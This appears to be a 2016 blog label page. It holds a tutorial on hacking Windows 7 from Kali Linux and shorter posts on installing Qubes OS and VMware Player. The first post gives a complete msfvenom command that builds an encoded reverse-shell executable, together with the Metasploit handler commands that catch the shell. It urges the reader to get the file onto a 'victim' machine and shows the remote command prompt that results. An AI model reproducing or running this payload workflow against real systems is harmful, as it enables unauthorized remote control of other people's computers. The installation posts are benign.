Social Icons

Showing posts with label Linux. Show all posts
Showing posts with label Linux. Show all posts

Tuesday, July 12, 2016

Windows 7 Hacked @ Kali Linux - msfvenom

This post gives you a step by step way to get shell or command terminal of a victim user on Windows 7 OS from an other PC with a loaded Kali OS.The setup scenario is like this as seen in the screen shots below in a virtual box environment :

KALI LINUX : IP Address eth1 : 192.168.1.7
 Windows 7 Ultimate Machine : IP Address : 192.168.1.8
 Pinging from Kali LInux Machine to Windows 7 Machine
 Pinging from Windows 7 to Kali Linux Machine
msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.Now need to go to Kali terminal and execute the following command :

p /windows/meterpreter/reverse_tcp designates the payload we want to embed
LHOST designates the local host
LPORT designates the port we want to listen on
-x designates the template we want to use and the path to it
-e x86/shikata_ga_nai designates the encoder we want to use
-f exe designates we want to create an executable (.exe)
anupam.exe designates the name of the file created

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.7 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/anupam.exe
Click to Enlarge
Followed by the following sets of command :

root@kali:~# file /tmp/anupam.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > show options

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST 192.168.1.7

msf exploit(handler) > set LPORT 3333

msf exploit(handler) > exploit

 
Now you need to apply your skills to take the file ..anupam.exe in this case to the windows machine.In my case for example,i have placed it on the desktop as seen below :
The moment the file anupam.exe is clicked and executed from the windows machine,we get the shell on the Kali Linux machine as seen below :
Here you have the C:\ prompt from the windows machine :-)

Wednesday, June 01, 2016

Qubes OS Installation in VMWARE Workstation player

1.   Qubes OS is a security-focused desktop operating system that aims to provide security through isolation.Virtualization is performed by Xen, and user environments can be based on Fedora, Debian, Whonix, and Microsoft Windows, among other operating systems.In my earlier post here at http://anupriti.blogspot.in/2016/05/qubes-os-installation-issue-with.html,wherein I had shown the installation issue I faced in Virtual Box,here I put forth (a pretty longish installation though about 2 hours plus) a series of steps along with screenshots as I was able to install the Qubes OS in VMWARE Workstation player.



























The only irritant thing is the installation time...it takes about 150 minutes to complete the entire installation.Rest any queries are welcome....

Monday, May 30, 2016

Qubes OS Installation issue with Virtual Box

1.    I have a habit of running most of the Operating systems in Virtual Environment(mostly Virtual Box) that I keep experimenting with.Till date I have had no issues running anyone of them inside Virtual Box including Ubuntu,Fedora ,Mint,BackBox , BackTrack ,Metasploit , Windows , Pentoo ,Knoppix ,Chromium OS, Arch Linux , Open Suse, Red Hat etc....in fact the list goes on.But whilst exploring the QUBES OS today...I found the Virtual Box unable to run it...and always getting the following screens :





2.   Qubes is a security-oriented operating system (OS) and an extract from the installation advise is shown below : 


Extract produced below :

Note: We don’t recommend installing Qubes in a virtual machine! It will likely not work. Please don’t send emails asking about it. You can, however, install it on an external USB hard drive and run from it, at least for testing.

3.  But further to my surprise,I found via Google searches that this OS works fine with VMWare workstation player.And after I tried it,I found it works perfectly fine as I show it in my next post.I though couldn't find a resolve or any kind of solution to run it fine on the Virtual Box but then till the time VMware workstation performs the task,I am ok :-)

VMware Workstation Player installation @UBUNTU 16.04 LTS

 1.    VMware Workstation Player is a virtualization software package for x64 computers running Microsoft Windows or Linux, supplied free of charge by VMware, Inc. VMware Player can run existing virtual appliances and create its own virtual machines and uses the same virtualization core as VMware Workstation, a similar program with more features, but not free of charge. VMware Player is available for personal non-commercial use, or for distribution or other use by written agreement. VMware, Inc. does not formally support Player, but there is an active community website for discussing and resolving issues, and a knowledge base.

2.   This post brings out few steps with screenshots and source details of download for the VMWare workstation version for Linux. The bundle package can be downloaded at https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0

3.   The file I downloaded from the above link is 

VMware-Player-12.1.1-3770994.x86_64.bundle

4.   Few steps to install this file further involves going to the terminal and executing the following commands :

chmod a+x VMware-Player-12.1.1-3770994.x86_64.bundle

the next step

sudo ./VMware-Player-12.1.1-3770994.x86_64.bundle

 this is followed with the following gui shots :







Ready to roll..........

Powered By Blogger